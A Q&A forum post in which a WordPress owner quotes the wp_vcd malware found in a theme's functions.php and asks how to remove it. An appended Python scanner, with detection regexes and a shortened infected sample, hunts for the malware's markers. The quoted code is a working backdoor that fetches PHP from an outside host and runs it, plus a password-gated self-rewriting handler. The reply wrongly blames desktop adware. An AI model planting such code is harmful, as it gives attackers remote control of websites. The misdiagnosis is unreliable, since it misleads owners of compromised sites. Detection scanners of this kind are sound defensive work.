GravityCode - 28 days ago
PHP Question

WordPress site has been redirecting my links to the onclickads website

I don't know if this is the code of onclickads.
Every time I click some links on my website, it redirects me to onclickads.com links.

Every time I remove this code from my theme's functions.php, it generates this code again and again. When I check the original file of the theme functions, this code is not included.

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {
        case 'change_domain';

            if (isset($_REQUEST['newdomain']))
            {
                if (!empty($_REQUEST['newdomain']))
                {
                    if ($file = @file_get_contents(__FILE__))
                    {
                        if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
                        {
                            $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}

if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
        {
            function w1p_te1mp_se1tup($phpCode) {
                $tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            extract(w1p_te1mp_se1tup($tmpcontent));
        }
    }
}

?>


Can anyone suggest what to do, or tutorials for removing the malware on my website?

Thank You.

Answer

This onclickads.com redirect is usually caused by adware installed on your computer. These adware programs are bundled with other free software that you download off of the Internet.

You might not need to install a fresh version; you can remove this type of caution from your site with the steps below.

To remove the onclickads.com redirect, follow these steps:

1) Remove the unwanted code from your file.

2) Uninstall malicious programs from Windows.

3) Use security software on your system, and also use a security plugin in your WordPress such as Anti-spam or Wordfence.

If nothing works after following these steps, then you can install a fresh version and install a security plugin with your fresh one to avoid hacking in future.

Hope this will be helpful for you. Thanks.
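
Added example, not part of the original question or answer: a small Python scanner that looks for the markers visible in the quoted snippet in every PHP file under a directory, which matters here because the asker reports the code coming back after removal. The indicator names, the regexes and the shortened sample are constructed for this example; a hit is a lead for manual review, not proof of infection.

```python
import re
import sys
from pathlib import Path

# Indicators derived from the injected snippet quoted in the question (regexes are this example's own).
INDICATORS = {
    "wp_vcd marker": re.compile(r"\$div_code_name\s*=\s*[\"']wp_vcd[\"']"),
    "password-gated request backdoor": re.compile(
        r"\$_REQUEST\[['\"]password['\"]\]\s*==\s*['\"][0-9a-f]{32}['\"]"),
    "self-rewriting file": re.compile(r"file_put_contents\(\s*__FILE__"),
    "remote code fetch": re.compile(
        r"file_get_contents\(\s*[\"']https?://[^\"']+\.php", re.I),
    # tempnam() followed shortly by include of a variable: fetched code being executed
    "temp-file include loader": re.compile(
        r"tempnam\(.{0,400}?\binclude\s+\$\w+", re.S),
}

def scan_text(php_source):
    """Return the sorted names of the indicators present in one PHP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(php_source))

def scan_tree(root):
    """Map each *.php file under root to the indicators it contains (clean files omitted)."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_text(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed samples: a shortened copy of the quoted injection, and ordinary theme code.
INFECTED_SAMPLE = r'''<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
$div_code_name="wp_vcd";
@file_put_contents(__FILE__, $file);
}
if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
{
$tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
include $tmpfname;
}
'''
CLEAN_SAMPLE = "<?php\nadd_action('after_setup_theme', 'mytheme_setup');\n"

if __name__ == "__main__":
    # Usage: python scan.py /path/to/wordpress   (defaults to the current directory)
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"{path}: {', '.join(found)}")
```

Run it against the whole WordPress directory, not only the active theme, and compare any flagged file with a clean copy of the same theme, plugin or core release.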